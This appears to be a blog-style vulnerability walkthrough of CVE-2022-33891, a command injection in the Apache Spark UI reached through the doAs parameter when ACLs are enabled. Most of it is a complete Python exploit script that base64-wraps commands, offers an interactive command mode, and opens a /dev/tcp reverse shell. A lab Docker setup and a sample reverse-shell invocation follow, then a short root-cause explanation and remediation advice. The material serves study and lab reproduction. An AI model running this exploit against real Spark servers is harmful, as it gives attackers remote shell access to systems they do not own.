Introduction
Spark is a unified analytics engine for large-scale data processing. It provides high-level APIs in Scala, Java, Python, and R, and an optimized engine that supports general computation graphs for data analysis. It also supports a rich set of higher-level tools, including Spark SQL for SQL and DataFrames, the pandas API on Spark for pandas workloads, MLlib for machine learning, GraphX for graph processing, and Structured Streaming for stream processing.
Affected versions
Apache Spark 3.0.3 and earlier, 3.1.1 through 3.1.2, and 3.2.0 through 3.2.1, when ACLs are enabled via spark.acls.enable in conf/spark-defaults.conf.
The PoC is as follows:

```python
#!/usr/bin/env python3
import requests
import argparse
import base64
import datetime


parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true",
                    help="Checks if the target is exploitable with a sleep test")

args = parser.parse_args()

full_url = f"{args.url}:{args.port}"


def check_for_vuln(url):
    print("[*] Attempting to connect to site...")
    r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False)
    if r.status_code != 403:
        print("[-] Does not look like an Apache Spark server.")
        quit(1)
    elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
        print("[-] Does not look like an Apache Spark server.")
        quit(1)
    else:
        print("[*] Performing sleep test of 10 seconds...")
        t1 = datetime.datetime.now()
        run_cmd("sleep 10")
        t2 = datetime.datetime.now()
        delta = t2 - t1
        if delta.seconds < 10:
            print("[-] Sleep was less than 10. This target is probably not vulnerable")
        else:
            print("[+] Sleep was 10 seconds! This target is probably vulnerable!")
    exit(0)


def cmd_prompt():
    # Provide the user with a command prompt in a loop to run commands
    cmd = input("> ")
    return cmd


def base64_encode(cmd):
    message_bytes = cmd.encode('ascii')
    base64_bytes = base64.b64encode(message_bytes)
    base64_cmd = base64_bytes.decode('ascii')
    return base64_cmd


def run_cmd(cmd):
    try:
        # Execute the given command through the doAs parameter
        base64_cmd = base64_encode(cmd)
        exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
        exploit_req = f"{full_url}{exploit}"
        print("[*] Full exploit request is: " + exploit_req)
        requests.get(exploit_req, allow_redirects=False)
    except Exception as e:
        print(str(e))


def revshell(lhost, lport):
    print(f"[*] Reverse shell mode.\n[*] Set up your listener by entering the following:\n nc -nvlp {lport}")
    input("[!] When your listener is set up, press enter!")
    rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    run_cmd(rev_shell_cmd)


def main():
    if args.check and args.revshell:
        print("[!] Please choose either revshell or check!")
        exit(1)
    elif args.check:
        check_for_vuln(full_url)
    # Revshell
    elif args.revshell:
        if not (args.listeninghost and args.listeningport):
            print("[x] You need a listeninghost and listening port!")
            exit(1)
        else:
            lhost = args.listeninghost
            lport = args.listeningport
            revshell(lhost, lport)
    else:
        # "Interactive" mode
        print("[*] \"Interactive\" mode!\n[!] Note: you will not receive any output from these commands. "
              "Try using something like ping or sleep to test for execution.")
        while True:
            command_to_run = cmd_prompt()
            run_cmd(command_to_run)


if __name__ == "__main__":
    main()
```
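The PoC's vulnerability check relies on a timing side channel: if a `sleep 10` injected through `doAs` delays the HTTP response by roughly ten seconds, the target most likely executed the command. The pattern can be distilled and verified locally (a sketch that substitutes `time.sleep` for the network request; the function names are illustrative, not from the PoC):

```python
import datetime
import time


def took_at_least(action, threshold_seconds):
    """Run `action` and report whether it took at least `threshold_seconds`."""
    t1 = datetime.datetime.now()
    action()
    t2 = datetime.datetime.now()
    return (t2 - t1).total_seconds() >= threshold_seconds


# A server that executes the injected sleep delays its response...
assert took_at_least(lambda: time.sleep(0.2), 0.2)
# ...while one that ignores the payload responds immediately.
assert not took_at_least(lambda: None, 0.2)
```

The same idea, with a 10-second threshold and an HTTP GET as the action, is what `check_for_vuln` in the PoC implements.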
If it fails, rebuild the project. Use the file below to bring up Docker; the problem may be the image, since Apache Spark configurations differ between repositories. This one is v3.0.0:

```yaml
version: '2'

services:

  spark:
    image: docker.io/bitnami/spark:3.0.0
    environment:
      - SPARK_MODE=master
      - SPARK_RPC_AUTHENTICATION_ENABLED=no
      - SPARK_RPC_ENCRYPTION_ENABLED=no
      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
      - SPARK_SSL_ENABLED=no
    ports:
      - '8080:8080'
```
Visit http://192.168.0.112:8080/
Modify the configuration file:

```shell
docker exec -it 8a /bin/bash
I have no name!@8a7873e77c46:/opt/bitnami/spark$ echo "spark.acls.enable true" >> conf/spark-defaults.conf
I have no name!@8a7873e77c46:/opt/bitnami/spark$ cat conf/spark-defaults.conf
```
With the configuration appended, restart Docker:

```shell
root@ubuntu:/home/ubuntu/Desktop/spark# docker-compose up -d
```
Use the PoC to generate the payload, or craft it by hand; either way, the command to execute must be written via echo and base64-encoded, then decoded at execution time for it to take effect.
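That wrapping can be reproduced in a few lines: the command is base64-encoded, and the `doAs` value decodes it and pipes it to bash via backtick command substitution (a sketch mirroring the PoC's `run_cmd`; the base URL is just the lab address from this walkthrough):

```python
import base64


def build_exploit_url(base_url, cmd):
    """Encode `cmd` and embed it in the vulnerable doAs parameter."""
    b64 = base64.b64encode(cmd.encode("ascii")).decode("ascii")
    # Backticks make the server shell out; base64 keeps the command from
    # breaking the URL or the shell quoting.
    return f"{base_url}/?doAs=`echo {b64} | base64 -d | bash`"


url = build_exploit_url("http://192.168.0.112:8080", "id")
# base64("id") is "aWQ=", so the payload reads: `echo aWQ= | base64 -d | bash`
assert "aWQ=" in url
```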
But there is no command output, so go straight to a reverse shell:

```shell
python 2.py -u http://192.168.0.112 -p 8080 --revshell -lh 192.168.0.121 -lp 4444
```
Check the connection status.
Root cause
The Apache Spark UI offers the option to enable ACLs via the configuration setting spark.acls.enable. With an authentication filter in place, this checks whether a user has permission to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter allows impersonation by supplying an arbitrary username. A malicious user can then reach the permission-check function, which ultimately builds a Unix shell command from their input and executes it, resulting in arbitrary shell command execution.
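To illustrate the class of bug (this is a hypothetical Python analogue, not Spark's actual Scala source): splicing the unvalidated `doAs` username into a shell line lets backticks trigger command substitution, while quoting the attacker-controlled value neutralizes them:

```python
import shlex


def groups_command_unsafe(username):
    # Vulnerable pattern: the username lands in the shell line verbatim,
    # so doAs=`touch /tmp/pwned` becomes command substitution when run by bash.
    return f"id -Gn {username}"


def groups_command_safe(username):
    # shlex.quote wraps the value in single quotes, defeating backticks.
    return f"id -Gn {shlex.quote(username)}"


payload = "`touch /tmp/pwned`"
assert "`" in groups_command_unsafe(payload)  # backticks survive unescaped
assert groups_command_safe(payload) == "id -Gn '`touch /tmp/pwned`'"
```

The fix in patched Spark versions addresses this code path; the sketch above only demonstrates why interpolating untrusted input into a shell command is exploitable.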
Reference: https://spark.apache.org/security.html
Remediation
1. Upgrade to a patched version; see the official download page:
https://spark.apache.org/downloads.html
2. Add a blacklist on security devices or add WAF rules (temporary measure).
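In addition, since the vulnerable code path is only reachable when ACLs are on, confirming that spark.acls.enable is not set to true (false is the default) also closes off this specific vector on unpatched hosts, at the cost of losing UI access control (a configuration sketch, not an official recommendation):

```
# conf/spark-defaults.conf -- temporary mitigation on unpatched hosts:
# leave ACLs disabled (the default) so the impersonation path is unreachable
spark.acls.enable false
```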